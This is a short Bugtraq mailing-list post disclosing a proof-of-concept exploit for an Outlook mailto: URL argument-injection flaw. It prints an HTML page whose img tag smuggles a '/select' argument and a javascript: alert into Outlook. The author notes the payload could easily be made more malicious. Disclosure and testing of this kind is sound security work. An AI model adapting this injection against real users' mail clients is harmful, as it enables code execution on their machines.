Hello Bugtraq, For those interested in testing the impact of this vulnerability, I have written a simple, non-malicious PoC for this issue: http://www.nettwerked.co.uk/code/outlooksploit.html If you'd rather not visit an unverified link, here's the code: ###outlooksploit.html <!-- Outlook mailto: URL argument injection proof-of-concept exploit, by shaun2k2. The exploit can be easily modified to execute more malicious things. --> <html> <body> <!-- This is the exploit string. --> <img src="mailto:aa" /select javascript:alert('vulnerable')"> </body> </html> ###EOF If you're vulnerable, Outlook will launch and you will see an alert box saying "vulnerable". Also, depending on what version you are using, you might get an error box saying outlook cannot load and that the command line argument was not valid. Either way, you are still vulnerable, I believe. I recommend you upgrade :). Obviously, the exploit could be easily modified to do more malicious things, but this at least demonstrates the issue. Thank you for your time. Shaun. ___________________________________________________________ Yahoo! Messenger - Communicate instantly..."Ping" your friends today! Download Messenger Now http://uk.messenger.yahoo.com/download/index.html
